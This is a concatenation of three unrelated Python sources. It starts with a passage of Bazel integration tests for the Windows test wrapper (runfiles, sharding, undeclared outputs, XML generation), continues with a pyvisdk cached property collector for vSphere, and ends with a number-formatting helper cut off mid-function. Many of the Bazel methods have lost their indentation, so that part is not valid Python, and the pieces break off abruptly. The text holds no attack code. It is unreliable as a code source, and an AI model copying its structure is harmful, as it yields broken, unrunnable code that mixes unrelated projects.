    ico_file_path = self.ScratchFile('foo/dummy.ico').replace('/', '\\')
    dat_file_path = self.ScratchFile('foo/dummy.dat').replace('/', '\\')
    with open(ico_file_path, 'wb') as f:
      f.write(ico_file)
    with open(dat_file_path, 'wb') as f:
      f.write(dat_file)
    self.CopyFile(
        src_path=self.Rlocation('io_bazel/src/test/py/bazel/native_test.bzl'),
        dst_path='foo/native_test.bzl')
    self.ScratchFile(
        'foo/undecl_test.py', [
            'from bazel_tools.tools.python.runfiles import runfiles',
            'import os',
            'import shutil',
            '',
            'root = os.environ.get("TEST_UNDECLARED_OUTPUTS_DIR")',
            'os.mkdir(os.path.join(root, "out1"))',
            'os.mkdir(os.path.join(root, "out2"))',
            'os.makedirs(os.path.join(root, "empty/sub"))',
            'r = runfiles.Create()',
            'shutil.copyfile(r.Rlocation("__main__/foo/dummy.ico"),',
            '                os.path.join(root, "out1", "data1.ico"))',
            'shutil.copyfile(r.Rlocation("__main__/foo/dummy.dat"),',
            '                os.path.join(root, "out2", "my data 2.dat"))',
        ],
        executable=True)
    self.ScratchFile(
        'foo/annot_test.py', [
            'import os',
            'root = os.environ.get("TEST_UNDECLARED_OUTPUTS_ANNOTATIONS_DIR")',
            'dir1 = os.path.join(root, "out1")',
            'dir2 = os.path.join(root, "out2.part")',
            'os.mkdir(dir1)',
            'os.mkdir(dir2)',
            'with open(os.path.join(root, "a.part"), "wt") as f:',
            '  f.write("Hello a")',
            'with open(os.path.join(root, "b.txt"), "wt") as f:',
            '  f.write("Hello b")',
            'with open(os.path.join(root, "c.part"), "wt") as f:',
            '  f.write("Hello c")',
            'with open(os.path.join(dir1, "d.part"), "wt") as f:',
            '  f.write("Hello d")',
            'with open(os.path.join(dir2, "e.part"), "wt") as f:',
            '  f.write("Hello e")',
        ],
        executable=True)
    self.ScratchFile(
        'foo/xml_test.py', [
            'from __future__ import print_function',
            'import time',
            'import sys',
            'print("stdout_line_1")',
            'print("stdout_line_2")',
            'time.sleep(2)',
            'print("stderr_line_1", file=sys.stderr)',
            'print("stderr_line_2", file=sys.stderr)',
        ],
        executable=True)
    self.ScratchFile(
        'foo/xml2_test.py', [
            'import os',
            'with open(os.environ.get("XML_OUTPUT_FILE"), "wt") as f:',
            '  f.write("leave this")'
        ],
        executable=True)
def _AssertPassingTest(self, flags):
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:passing_test',
'-t-',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
def _AssertFailingTest(self, flags):
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:failing_test',
'-t-',
] + flags)
self.AssertExitCode(exit_code, 3, stderr)
def _AssertPrintingTest(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:printing_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
lorem = False
for line in stderr + stdout:
if line.startswith('lorem ipsum'):
lorem = True
elif line.startswith('HOME='):
home = line[len('HOME='):]
elif line.startswith('TEST_SRCDIR='):
srcdir = line[len('TEST_SRCDIR='):]
elif line.startswith('TEST_TMPDIR='):
tmpdir = line[len('TEST_TMPDIR='):]
elif line.startswith('USER='):
user = line[len('USER='):]
if not lorem:
self._FailWithOutput(stderr + stdout)
if not home:
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(home):
self._FailWithOutput(stderr + stdout)
if not os.path.isdir(srcdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isfile(os.path.join(srcdir, 'MANIFEST')):
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(srcdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isdir(tmpdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(tmpdir):
self._FailWithOutput(stderr + stdout)
if not user:
self._FailWithOutput(stderr + stdout)
def _AssertRunfiles(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:runfiles_test',
'-t-',
'--test_output=all',
# Ensure Bazel does not create a runfiles tree.
'--enable_runfiles=no',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
mf = mf_only = rf_dir = path = exists = None
for line in stderr + stdout:
if line.startswith('MF='):
mf = line[len('MF='):]
elif line.startswith('ONLY='):
mf_only = line[len('ONLY='):]
elif line.startswith('DIR='):
rf_dir = line[len('DIR='):]
elif line.startswith('data_path='):
path = line[len('data_path='):]
elif line.startswith('data_exists='):
exists = line[len('data_exists='):]
if mf_only != '1':
self._FailWithOutput(stderr + stdout)
if not os.path.isfile(mf):
self._FailWithOutput(stderr + stdout)
mf_contents = TestWrapperTest._ReadFile(mf)
# Assert that the data dependency is listed in the runfiles manifest.
if not any(
line.split(' ', 1)[0].endswith('foo/dummy.dat')
for line in mf_contents):
self._FailWithOutput(mf_contents)
if not os.path.isdir(rf_dir):
self._FailWithOutput(stderr + stdout)
if not path:
# Expect the $(location) expansion in 'args' worked
self._FailWithOutput(stderr + stdout)
if exists != '0':
# Runfiles are disabled, expect the runfile symlink to be missing.
self._FailWithOutput(stderr + stdout)
def _AssertRunfilesSymlinks(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:runfiles_test',
'-t-',
'--test_output=all',
# Ensure Bazel creates a runfiles tree.
'--enable_runfiles=yes',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
mf_only = rf_dir = path = exists = None
for line in stderr + stdout:
if line.startswith('ONLY='):
mf_only = line[len('ONLY='):]
elif line.startswith('DIR='):
rf_dir = line[len('DIR='):]
elif line.startswith('data_path='):
path = line[len('data_path='):]
elif line.startswith('data_exists='):
exists = line[len('data_exists='):]
if mf_only == '1':
self._FailWithOutput(stderr + stdout)
if not rf_dir or not os.path.isdir(rf_dir):
self._FailWithOutput(stderr + stdout)
if not path:
# Expect the $(location) expansion in 'args' worked
self._FailWithOutput(stderr + stdout)
if exists != '1':
# Runfiles are enabled, expect the runfile symlink to exist.
self._FailWithOutput(stderr + stdout)
def _AssertShardedTest(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:sharded_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
status = None
index_lines = []
for line in stderr + stdout:
if line.startswith('STATUS='):
status = line[len('STATUS='):]
elif line.startswith('INDEX='):
index_lines.append(line)
if not status:
self._FailWithOutput(stderr + stdout)
# Test test-setup.sh / test wrapper only ensure that the directory of the
# shard status file exist, not that the file itself does too.
if not os.path.isdir(os.path.dirname(status)):
self._FailWithOutput(stderr + stdout)
if sorted(index_lines) != ['INDEX=0 TOTAL=2', 'INDEX=1 TOTAL=2']:
self._FailWithOutput(stderr + stdout)
def _AssertUnexportsEnvvars(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:unexported_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
good = bad = None
for line in stderr + stdout:
if line.startswith('GOOD='):
good = line[len('GOOD='):]
elif line.startswith('BAD='):
bad = line[len('BAD='):]
if not good or bad:
self._FailWithOutput(stderr + stdout)
def _AssertTestArgs(self, flags):
exit_code, bazel_bin, stderr = self.RunBazel(['info', 'bazel-bin'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_bin = bazel_bin[0]
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:testargs_test',
'-t-',
'--test_output=all',
'--test_arg=baz',
'--test_arg="x y"',
'--test_arg=""',
'--test_arg=qux',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
actual = []
for line in stderr + stdout:
if line.startswith('arg='):
actual.append(str(line[len('arg='):]))
self.assertListEqual(
[
'(foo)',
# TODO(laszlocsomor): assert that "a b" is passed as one argument,
# not two, after https://github.com/bazelbuild/bazel/issues/6277
# is fixed.
'(a)',
'(b)',
# TODO(laszlocsomor): assert that the empty string argument is
# passed, after https://github.com/bazelbuild/bazel/issues/6276
# is fixed.
'(c d)',
'()',
'(bar)',
'(baz)',
'("x y")',
'("")',
'(qux)',
],
actual)
  def _AssertUndeclaredOutputs(self, flags):
    """Runs //foo:undecl_test and checks its undeclared test outputs.

    Verifies that files the test wrote under TEST_UNDECLARED_OUTPUTS_DIR were
    zipped into outputs.zip and listed with size and MIME type in MANIFEST.
    """
    exit_code, bazel_testlogs, stderr = self.RunBazel(
        ['info', 'bazel-testlogs'])
    self.AssertExitCode(exit_code, 0, stderr)
    bazel_testlogs = bazel_testlogs[0]
    exit_code, _, stderr = self.RunBazel([
        'test',
        '//foo:undecl_test',
        '-t-',
        '--test_output=errors',
    ] + flags)
    self.AssertExitCode(exit_code, 0, stderr)
    # The zipped undeclared outputs live under bazel-testlogs.
    undecl_zip = os.path.join(bazel_testlogs, 'foo', 'undecl_test',
                              'test.outputs', 'outputs.zip')
    self.assertTrue(os.path.exists(undecl_zip))
    zip_content = {}
    with zipfile.ZipFile(undecl_zip, 'r') as z:
      # Map each archive member to its uncompressed size; directory entries
      # (trailing '/') have size 0.
      zip_content = {f: z.getinfo(f).file_size for f in z.namelist()}
    self.assertDictEqual(
        zip_content, {
            'out1/': 0,
            'out2/': 0,
            'empty/': 0,
            'empty/sub/': 0,
            'out1/data1.ico': 70,
            'out2/my data 2.dat': 16
        })
    undecl_mf = os.path.join(bazel_testlogs, 'foo', 'undecl_test',
                             'test.outputs_manifest', 'MANIFEST')
    self.assertTrue(os.path.exists(undecl_mf))
    mf_content = []
    with open(undecl_mf, 'rt') as f:
      mf_content = [line.strip() for line in f.readlines()]
    # Using an ".ico" file as example, because as of 2018-11-09 Bazel's CI
    # machines run Windows Server 2016 core which recognizes fewer MIME types
    # than desktop Windows versions, and one of the recognized types is ".ico"
    # files.
    # Update(2019-03-05): apparently this MIME type is now recognized on CI as
    # "image/vnd.microsoft.icon". The standard MIME type is "image/x-icon",
    # but Wikipedia lists a few alternative ones, so the test will accept all
    # of them.
    if len(mf_content) != 2:
      self._FailWithOutput(mf_content)
    # Manifest rows are tab-separated: <path>\t<size>\t<mime type>.
    tokens = mf_content[0].split('\t')
    if (len(tokens) != 3 or tokens[0] != 'out1/data1.ico' or
        tokens[1] != '70' or tokens[2] not in [
            'image/x-icon', 'image/vnd.microsoft.icon', 'image/ico',
            'image/icon', 'text/ico', 'application/ico'
        ]):
      self._FailWithOutput(mf_content)
    if mf_content[1] != 'out2/my data 2.dat\t16\tapplication/octet-stream':
      self._FailWithOutput(mf_content)
def _AssertUndeclaredOutputsAnnotations(self, flags):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:annot_test',
'-t-',
'--test_output=errors',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
undecl_annot = os.path.join(bazel_testlogs, 'foo', 'annot_test',
'test.outputs_manifest', 'ANNOTATIONS')
self.assertTrue(os.path.exists(undecl_annot))
annot_content = []
with open(undecl_annot, 'rt') as f:
annot_content = [line.strip() for line in f.readlines()]
self.assertListEqual(annot_content, ['Hello aHello c'])
  def _AssertXmlGeneration(self, flags, split_xml=False):
    """Runs //foo:xml_test and validates the generated test.xml.

    Args:
      flags: list of str; extra flags for `bazel test`
      split_xml: bool; whether to request XML generation via
        --experimental_split_xml_generation or its "no" negation
    """
    exit_code, bazel_testlogs, stderr = self.RunBazel(
        ['info', 'bazel-testlogs'])
    self.AssertExitCode(exit_code, 0, stderr)
    bazel_testlogs = bazel_testlogs[0]
    exit_code, _, stderr = self.RunBazel([
        'test',
        '//foo:xml_test',
        '-t-',
        '--test_output=errors',
        '--%sexperimental_split_xml_generation' % ('' if split_xml else 'no'),
    ] + flags)
    self.AssertExitCode(exit_code, 0, stderr)
    test_xml = os.path.join(bazel_testlogs, 'foo', 'xml_test', 'test.xml')
    self.assertTrue(os.path.exists(test_xml))
    duration = 0
    xml_contents = []
    stdout_lines = []
    stderr_lines = []
    with open(test_xml, 'rt') as f:
      xml_contents = [line.strip() for line in f]
    for line in xml_contents:
      if 'duration=' in line:
        # Extract the value of the duration="..." attribute (last one wins).
        line = line[line.find('duration="') + len('duration="'):]
        line = line[:line.find('"')]
        duration = int(line)
      elif 'stdout_line' in line:
        stdout_lines.append(line)
      elif 'stderr_line' in line:
        stderr_lines.append(line)
    # Since stdout and stderr of the test are redirected to the same file, it's
    # possible that a line L1 written to stdout before a line L2 written to
    # stderr is dumped to the file later, i.e. the file will have lines L2 then
    # L1. It is however true that lines printed to the same stream (stdout or
    # stderr) have to preserve their ordering, i.e. if line L3 is printed to
    # stdout after L1, then it must be strictly ordered after L1 (but not
    # necessarily after L2).
    # Therefore we only assert partial ordering of lines.
    if duration <= 1:
      self._FailWithOutput(xml_contents)
    if (len(stdout_lines) != 2 or 'stdout_line_1' not in stdout_lines[0] or
        'stdout_line_2' not in stdout_lines[1]):
      self._FailWithOutput(xml_contents)
    if (len(stderr_lines) != 2 or 'stderr_line_1' not in stderr_lines[0] or
        'stderr_line_2' not in stderr_lines[1]):
      self._FailWithOutput(xml_contents)
def _AssertXmlGeneratedByTestIsRetained(self, flags, split_xml=False):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:xml2_test',
'-t-',
'--test_output=errors',
'--%sexperimental_split_xml_generation' % ('' if split_xml else 'no'),
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
test_xml = os.path.join(bazel_testlogs, 'foo', 'xml2_test', 'test.xml')
self.assertTrue(os.path.exists(test_xml))
xml_contents = []
with open(test_xml, 'rt') as f:
xml_contents = [line.strip() for line in f.readlines()]
self.assertListEqual(xml_contents, ['leave this'])
# Test that the native test wrapper can run tests from external repositories.
# See https://github.com/bazelbuild/bazel/issues/8088
# Unfortunately as of 2019-04-18 the legacy test wrapper (test-setup.sh) also
# has this bug, but I (@laszlocsomor) work on enabling the native test wrapper
# by default so fixing the legacy one seems to make little sense.
def testRunningTestFromExternalRepo(self):
rule_definition = [
'load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")',
'local_repository(name = "a", path = "a")'
]
rule_definition.extend(self.GetDefaultRepoRules())
self.ScratchFile('WORKSPACE', rule_definition)
self.CreateWorkspaceWithDefaultRepos('a/WORKSPACE')
self.ScratchFile('BUILD', ['py_test(name = "x", srcs = ["x.py"])'])
self.ScratchFile('a/BUILD', ['py_test(name = "x", srcs = ["x.py"])'])
self.ScratchFile('x.py')
self.ScratchFile('a/x.py')
for flag in ['--legacy_external_runfiles', '--nolegacy_external_runfiles']:
for target in ['//:x', '@a//:x']:
exit_code, _, stderr = self.RunBazel([
'test',
'-t-',
'--incompatible_windows_native_test_wrapper',
'--shell_executable=',
'--test_output=errors',
'--verbose_failures',
flag,
target,
])
self.AssertExitCode(
exit_code, 0,
['flag=%s' % flag, 'target=%s' % target] + stderr)
def _RunTests(self, flags):
self._CreateMockWorkspace()
flags = ['--noincompatible_windows_native_test_wrapper']
self._AssertPassingTest(flags)
self._AssertFailingTest(flags)
self._AssertPrintingTest(flags)
self._AssertRunfiles(flags)
self._AssertRunfilesSymlinks(flags)
self._AssertShardedTest(flags)
self._AssertUnexportsEnvvars(flags)
self._AssertTestArgs(flags)
self._AssertUndeclaredOutputs(flags)
self._AssertUndeclaredOutputsAnnotations(flags)
self._AssertXmlGeneration(flags, split_xml=False)
self._AssertXmlGeneration(flags, split_xml=True)
self._AssertXmlGeneratedByTestIsRetained(flags, split_xml=False)
self._AssertXmlGeneratedByTestIsRetained(flags, split_xml=True)
  def testTestExecutionWithTestSetupSh(self):
    """Runs all test scenarios using the legacy test-setup.sh wrapper."""
    self._RunTests(['--noincompatible_windows_native_test_wrapper'])
  def testTestExecutionWithTestWrapperExe(self):
    """Runs all test scenarios using the native Windows test wrapper.

    --shell_executable= is cleared, presumably to prove no shell is needed
    on this code path — confirm with the flag's documentation.
    """
    self._RunTests(
        ['--incompatible_windows_native_test_wrapper', '--shell_executable='])
# Allow running this test file directly, outside the Bazel test runner.
if __name__ == '__main__':
  unittest.main()
|
|
from infi.pyutils.lazy import cached_method
from pyvisdk.do.traversal_spec import TraversalSpec
from pyvisdk.do.selection_spec import SelectionSpec
from pyvisdk.do.wait_options import WaitOptions
from logging import getLogger
from re import match, findall
from bunch import Bunch
logger = getLogger(__name__)
INITIAL_VERSION = ''
# foo.bar
# foo.arProp["key val"]
# foo.arProp["key val"].baz
PROPERTY_NAME_PATTERN = r'\w+|\["[^"\]]+"\]'
class CachedPropertyCollector(object):
    """
    Facade for using PropertyCollectors to fetch a list of properties from all instances of a specific object_type

    The collector keeps a local cache of the requested properties and merges
    incremental server updates (WaitForUpdatesEx) into it, so repeated reads
    are cheap.

    :param vim: :py:class:`Vim` instance
    :param managedObjectTypeName: A name of managed object type, e.g. HostSystem
    :param propertiesList: A list of properties to fetch, can be nested, e.g. config.storageDevice
    """

    def __init__(self, vim, managedObjectTypeName, propertiesList):
        super(CachedPropertyCollector, self).__init__()
        self._vim = vim
        self._managedObjectTypeName = managedObjectTypeName
        self._propertiesList = propertiesList
        # Version token of the last server update merged into the cache; the
        # initial empty string makes WaitForUpdatesEx return a full snapshot.
        self._version = INITIAL_VERSION
        # Cache layout: {moref string: {property path: value}}
        self._result = {}

    def __repr__(self):
        # getattr() defaults keep repr() usable even on a half-initialized
        # instance.
        args = (self.__class__.__name__, getattr(self, '_managedObjectTypeName', None),
                getattr(self, '_propertiesList', []), getattr(self, '_version', repr('')))
        return "<{}: objectType={!r}, properties={!r}, version={}>".format(*args)

    def _guessTraversalSpecName(self, managed_object_type_name, property_name):
        """:returns: A guessable name of a TraversalSpec being used in this facade"""
        name = "{}.{}".format(managed_object_type_name, property_name)
        return name

    def _createTraversalSpec(self, managed_object_type_name, property_name, next_selector_names=[]):
        """:returns: a TravelSpec object whose name is '{managed_object_type_name}.{property_name}'"""
        # NOTE(review): mutable default argument; harmless here because the
        # list is only iterated, never mutated — but worth cleaning up.
        return TraversalSpec(self._vim, name=self._guessTraversalSpecName(managed_object_type_name, property_name),
                             type=managed_object_type_name, path=property_name,
                             selectSet=[SelectionSpec(self._vim, name=name) for name in next_selector_names])

    @cached_method
    def _getContainerView(self):
        """:returns: a (cached) ContainerView over all objects of the managed type"""
        kwargs = dict(container=self._vim.root, type=[self._managedObjectTypeName], recursive=True)
        return self._vim.service_content.viewManager.CreateContainerView(**kwargs)

    @cached_method
    def _getObjectSet(self):
        """:returns: the ObjectSpec anchoring the property filter at the container view"""
        from pyvisdk.do.object_spec import ObjectSpec
        return ObjectSpec(self._vim, obj=self._getContainerView().ref,
                          selectSet=self._getSelectSet())

    @cached_method
    def _getPropSet(self):
        """:returns: the PropertySpec list describing which properties to fetch"""
        from pyvisdk.do.property_spec import PropertySpec
        return [PropertySpec(self._vim, type=self._managedObjectTypeName, pathSet=self._propertiesList)]

    @cached_method
    def _getPropertyCollector(self):
        """:returns: a (cached) server-side PropertyCollector with our filter installed"""
        property_collector = self._vim.service_content.propertyCollector.CreatePropertyCollector()
        # partialUpdates=True lets the server send property-level deltas.
        property_collector.CreateFilter(self._getPropertyFilterSpec(), partialUpdates=True)
        return property_collector

    @cached_method
    def _getPropertyFilterSpec(self):
        """:returns: the PropertyFilterSpec combining the prop set and object set"""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.FilterSpec.html
        from pyvisdk.do.property_filter_spec import PropertyFilterSpec
        return PropertyFilterSpec(self._vim, propSet=self._getPropSet(),
                                  objectSet=[self._getObjectSet()])

    @cached_method
    def _getSelectSet(self):
        """This method returns a SelectSet that travels the entire heirarchy.
        If you want to go over heirarchy in a more efficient way, overload this method"""
        select_set = list(self._vim._buildFullTraversal())
        select_set.append(self._createTraversalSpec("ContainerView", 'container',
                          [select.name for select in select_set]))
        return select_set

    def _getChanges(self, time_in_seconds=0, truncated_version=None):
        """Polls the server for updates since the cached version.

        :param time_in_seconds: maximum seconds WaitForUpdatesEx may block
        :param truncated_version: continuation token when a previous update
            set was truncated; takes precedence over the cached version
        :returns: an UpdateSet, or None when nothing changed
        """
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.html#waitForUpdatesEx
        property_collector = self._getPropertyCollector()
        wait_options = WaitOptions(self._vim, maxWaitSeconds=time_in_seconds)
        logger.debug("Checking for updates on property collector {!r}".format(self))
        update = property_collector.WaitForUpdatesEx(truncated_version or self._version,
                                                     wait_options)
        logger.debug("There is {} pending update".format('no' if update is None else 'indeed an'))
        return update

    def _refToString(self, ref):
        """:returns: a cache key string built as '<type>:<value>' from a MoRef"""
        return "{}:{}".format(ref._type, ref.value)

    def _mergeObjectUpdateIntoCache__enter(self, object_ref_key, objectUpdate):
        """Handles an 'enter' update: a new object appeared; (re)build its cache entry."""
        # Rebuild the properties dict
        properties = {propertyChange.name:propertyChange.val
                      for propertyChange in filter(lambda propertyChange:propertyChange.op in ['add', 'assign'],
                                                   objectUpdate.changeSet)}
        message = "Replacing cache for object_ref_key {} with a dictionary of the following keys {}"
        logger.debug(message.format(object_ref_key, properties.keys()))
        self._result[object_ref_key] = properties

    def _mergeObjectUpdateIntoCache__leave(self, object_ref_key, objectUpdate=None):
        """Handles a 'leave' update: the object disappeared from the view."""
        # the object no longer exists, we drop it from the result dictionary
        logger.debug("Removing object_ref_key {} from cache".format(object_ref_key))
        _ = self._result.pop(object_ref_key, None)

    def _split_property_path(self, key):
        """Splits a property path into its name["key"] segments.

        NOTE(review): appears unused within this class (seemingly superseded
        by _walk_on_property_path) — verify external callers before removing.
        """
        return findall(r"[A-Za-z]*\[[^\]]+\]", key)

    def _walk_on_property_path(self, path):
        """Tokenizes a property path into Bunch(type=..., value=...) items.

        'property' tokens are plain attribute names; 'key' tokens come from
        ["..."] segments, with the surrounding '["' and '"]' stripped off.
        """
        from re import findall
        matches = [Bunch(value=item) for item in findall(PROPERTY_NAME_PATTERN, path)]
        for match in matches:
            if match.value.startswith('['):
                match.type = "key"
                match.value = match.value[2:-2]
            else:
                match.type = "property"
        return matches

    def _get_list_and_object_to_update(self, property_dict, path, value, last=False):
        """Locates the cached container object that a property change targets.

        NOTE(review): assumes some cached key is a prefix of path; if none is,
        the loop falls through with whatever key came last (and raises
        NameError on an empty dict) — presumably the server only sends paths
        under a fetched property; confirm.
        """
        for key in property_dict.keys():
            if path.startswith(key):
                break
        # key is a prefix of path
        if path == key:
            return property_dict
        object_to_update = property_dict[key]
        path = path.replace(key, '').lstrip('.')
        walks = self._walk_on_property_path(path)
        # With last=True walk the full path; otherwise stop one step short so
        # the caller can assign/remove on the parent container.
        for item in walks if last else walks[:-1]:
            if item.type == "key":
                object_to_update = [element for element in object_to_update if element.key == item.value][0]
            else:
                if isinstance(object_to_update, (dict, Bunch)):
                    object_to_update = object_to_update.get(item.value)
                else:
                    object_to_update = getattr(object_to_update, item.value)
        return object_to_update

    def _get_property_name_to_update(self, property_dict, path):
        """:returns: the final attribute/key name that an 'assign' must set"""
        for key in property_dict.keys():
            if path == key:
                return key
        return self._walk_on_property_path(path)[-1].value

    def _get_key_to_remove(self, key):
        """:returns: the trailing path token identifying the element to remove"""
        return self._walk_on_property_path(key)[-1].value

    def _mergePropertyChange__add(self, property_dict, key, value):
        """Applies an 'add' PropertyChange to the cached container."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
        list_to_update = self._get_list_and_object_to_update(property_dict, key, value)
        logger.debug("Appending {}".format(value.__class__))
        # NOTE(review): insert(-1, value) places the new element *before* the
        # current last one, not at the end. If element ordering matters this
        # looks like a bug (append(value) would truly append) — confirm.
        list_to_update.insert(-1, value)

    def _mergePropertyChange__assign(self, property_dict, key, value):
        """Applies an 'assign' PropertyChange to the cached container."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
        object_to_update = self._get_list_and_object_to_update(property_dict, key, value, key.endswith(']'))
        name = self._get_property_name_to_update(property_dict, key)
        logger.debug("Assigning {} to {}".format(value.__class__, name))
        # Dict-like targets get __setitem__; other objects get __setattr__.
        assignment_method = getattr(object_to_update, "__setitem__", object_to_update.__setattr__)
        assignment_method(name, value)

    def _mergePropertyChange__remove(self, property_dict, key, value):
        """Applies a 'remove' PropertyChange; the value argument is unused."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
        list_to_update = self._get_list_and_object_to_update(property_dict, key, value)
        key_to_remove = self._get_key_to_remove(key)
        value = [item for item in list_to_update if item.key == key_to_remove][0]
        list_to_update.remove(value)

    def _mergeObjectUpdateIntoCache__modify(self, object_ref_key, objectUpdate):
        """Handles a 'modify' update by applying each PropertyChange in order."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.ObjectUpdate.html
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.MissingProperty.html
        properties = self._result[object_ref_key]
        logger.debug("Modifying cache for object_ref_key {}".format(object_ref_key))
        updatemethods = dict(add=self._mergePropertyChange__add,
                             assign=self._mergePropertyChange__assign,
                             remove=self._mergePropertyChange__remove,
                             indirectRemove=self._mergePropertyChange__remove)
        for propertyChange in objectUpdate.changeSet:
            logger.debug("Modifying property {}, operation {}".format(propertyChange.name, propertyChange.op))
            updatemethods[propertyChange.op](properties, propertyChange.name, propertyChange.val)
        for missingSet in objectUpdate.missingSet:
            logger.debug("Removing from cache a property that has gone missing{}".format(missingSet.path))
            self._mergePropertyChange__remove(properties, missingSet.path, None)

    def _mergeObjectUpdateIntoCache(self, objectUpdate):
        """Dispatches an ObjectUpdate to the enter/leave/modify handler."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.ObjectUpdate.html
        updateMethods = dict(enter=self._mergeObjectUpdateIntoCache__enter,
                             leave=self._mergeObjectUpdateIntoCache__leave,
                             modify=self._mergeObjectUpdateIntoCache__modify)
        object_ref_key = self._refToString(objectUpdate.obj.ref)
        logger.debug("Update kind {} on cache key {}".format(objectUpdate.kind, object_ref_key))
        updateMethods[objectUpdate.kind](object_ref_key, objectUpdate)

    def _mergeChangesIntoCache(self, update):
        """Merges a (possibly truncated) UpdateSet into the local cache."""
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.UpdateSet.html
        # http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.FilterUpdate.html
        for filterSet in update.filterSet:
            for key in map(lambda missingObject: self._refToString(missingObject.obj), filterSet.missingSet):
                logger.debug("Removing key {} from cache because it is missing in the filterSet".format(key))
                _ = self._result.pop(key, None)
            for objectUpdate in filterSet.objectSet:
                self._mergeObjectUpdateIntoCache(objectUpdate)
        if update.truncated:
            # Truncated update set: recursively fetch and merge the remainder
            # before the cached version token is advanced.
            self._mergeChangesIntoCache(self._getChanges(0, update.version))
        else:
            self._version = update.version
            logger.debug("Cache is updated for version {}".format(self._version))

    def checkForUpdates(self):
        """:returns: True if the cached data is not up to date"""
        return self.waitForUpdates(0)

    def getProperties(self):
        """This method checks first if there are changes in the server.
        If there are, the changes are merged into the cache and then returned from the cache.
        If there are not, the data is returned from the cache.

        :rtype: a dictionary with MoRefs as keys, and propertyName=propertyValue dictionary as values"""
        update = self._getChanges()
        if update is not None:
            self._mergeChangesIntoCache(update)
        return self.getPropertiesFromCache()

    def getPropertiesFromCache(self):
        """:returns: the cached properties immediately from the cache.

        :rtype: a dictionary with MoRefs as keys, and propertyName=propertyValue dictionary as values"""
        return self._result

    def waitForUpdates(self, time_in_seconds):
        """This method is blocking a maximum time of time_in_seconds, depending if there are changes on the server.
        This method does not update the cache with the changes, if there are any.

        :returns: True if there are updates on the server, False if there are not."""
        update = self._getChanges(time_in_seconds)
        return update is not None
class HostSystemCachedPropertyCollector(CachedPropertyCollector):
    """
    Facade for fetching host attributes by using a faster traversal (e.g no need to traverse inside HostSystem)
    """

    def __init__(self, vim, hostProperties):
        # Fixes the managed object type to 'HostSystem'.
        super(HostSystemCachedPropertyCollector, self).__init__(vim, 'HostSystem', hostProperties)

    @cached_method
    def _getSelectSet(self):
        """Returns a minimal SelectSet covering only the paths that lead to
        HostSystem objects (Folder/Datacenter/ComputeResource/
        ClusterComputeResource), instead of the full traversal built by the
        base class."""
        select_set = list()
        select_set.append(self._createTraversalSpec("ClusterComputeResource", 'host'))
        select_set.append(self._createTraversalSpec("ComputeResource", 'host'))
        select_set.append(self._createTraversalSpec("Datacenter", 'hostFolder',
                          ['Folder.childEntity']))
        select_set.append(self._createTraversalSpec("Folder", 'childEntity',
                          ['Datacenter.hostFolder', 'ClusterComputeResource.host', 'ComputeResource.host']))
        # The container view selector chains into every selector added above.
        select_set.append(self._createTraversalSpec("ContainerView", 'container',
                          [select.name for select in select_set]))
        return select_set
|
|
from __future__ import division
from decimal import Decimal, getcontext
from string import ascii_lowercase, maketrans
def format_num(num, decplaces=10):
    """Convert a number into a more readable string version.

    Args:
        num: anything Decimal() accepts (int, float, numeric string, Decimal).
        decplaces: decimal places to round to; values < 1 round to an integer.

    Returns:
        The number as a string without trailing zeros or a trailing decimal
        point, or "bad" if num cannot be interpreted as a number.
    """
    try:
        dec = Decimal(num)
        # Cut the decimal off at "decplaces" decimal places.
        if decplaces < 1:
